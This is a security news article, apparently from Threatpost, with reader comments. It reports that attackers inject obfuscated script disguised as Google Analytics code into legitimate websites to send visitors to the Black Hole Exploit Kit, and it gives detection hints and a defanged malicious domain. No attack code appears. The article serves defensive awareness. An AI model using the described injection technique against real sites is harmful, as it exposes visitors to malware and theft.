Attackers Using Fake Google Analytics Code to Redirect Users to Black Hole Exploit Kit

Injecting malicious code into the HTML used on legitimate Web sites is a key part of the infection lifecycle for many attack crews, and they often disguise and obfuscate their code to make it more difficult to analyze or so it appears to be legitimate code. The latest instance of this technique has seen attackers employing code that is meant to look like Google Analytics snippets, but instead sends victims off to a remote site that’s hosting the Black Hole Exploit Kit. Not the desired result.

BlackholeInjecting malicious code into the HTML used on legitimate Web sites is a key part of the infection lifecycle for many attack crews, and they often disguise and obfuscate their code to make it more difficult to analyze or so it appears to be legitimate code. The latest instance of this technique has seen attackers employing code that is meant to look like Google Analytics snippets, but instead sends victims off to a remote site that’s hosting the Black Hole Exploit Kit. Not the desired result.

Researchers at Websense discovered the ongoing attack recently, and found that the code being used to hide the fake Google Analytics tags is heavily obfuscated, making analysis quite difficult. The malicious code, which is being injected into benign pages on legitimate sites, is designed to look just like actual Google Analytics code and to appear as thought it’s referring to common domains. But there are some tell-tale signs that this isn’t the case.

“It is quite convincing at first glance, but remember, usually we put the analytics code at the bottom of the page, instead of at the top, so this is a good hint to Web masters. Another hint is that they are using “UA-XXXXX-X”, a placeholder as their “Google Analytics account”, obviously this is not what people usually do. We found other similar domains like google-analytics[dot]su in this attack, and will update once we find more,” Websense’s Tim Xia wrote in an analysis of the attack campaign.

The end result of the infection routine is that the victim is passed off to a site that is hosting the Black Hole Exploit Kit, a notoriously nasty piece of software that will try a grab-bag of exploits against the victim’s browser until one works. Once that’s done, another piece of malware typically is installed on the user’s machine, perhaps a keylogger or banker Trojan designed to relieve the victim of her money.

Black Hole is one of several readily available exploit kits that attack crews of all makes and models use to install malware on thousands of machines. Black Hole, along with other kits, such as Eleonore and Siberia, give attackers a built-in set of exploits that can be used to go after vulnerabilities in browsers such as Internet Explorer, Firefox and Chrome. Last spring, a version of Black Hole was uploaded to some file-sharing sites and made available for free. At the time, researchers said that they expected Black Hole to be used in more attacks going forward, and that prediction has been borne out.

“If the ZeuS leak was like giving a machine gun for free, giving away exploit kits is like providing the ammo. We will now see much more use of those exploit and malware kits by less talented groups of cyber criminals,” said Aviv Raff, CTO at security firm Seculert, said at the time of the leak of the free version of Black Hole.

Suggested articles

Discussion

  • David on

    So I get an e-mail that appears to come from a member of a blog type webpage to which I subscribe. Nothing much in the e-mail message except a link for a webpage with a name like "photos" or something.  Could it be a link to something serving Black Hole?

  • Dennis Fisher on

    That's certainly possible. In many cases, those emails redirect you to a page that includes some kind of drive-by download exploit, and those often are done with Black Hole or Eleonore or something similar. Just opening those emails can be dangerous, so I'd avoid that if at all possible.

  • Anonymous on

    Click on the link. Do it. Be somebody.
  • Anonymous on

    Of course it *could* be malicious, but instead of asking general theory in a forum you could copy the link location and run it through wepawet or virustotal and test it yourself.

  • Anonymous on

    Use a VM, with webscarab and wireshark running.  Have some fun.

  • Anonymous on

    So I take it that since I have google analytics as something not allowed by default on NoScript, I should be a little bit safer, at least in regards to sites that have been hit by this? Actually I have all scripts pretty much turned off and only let them in one at a time if it's something I really need.
  • Doc Ray on

    upgrade ur lives and get a mac...

    ;)

Subscribe to our newsletter, Threatpost Today!

Get the latest breaking news delivered daily to your inbox.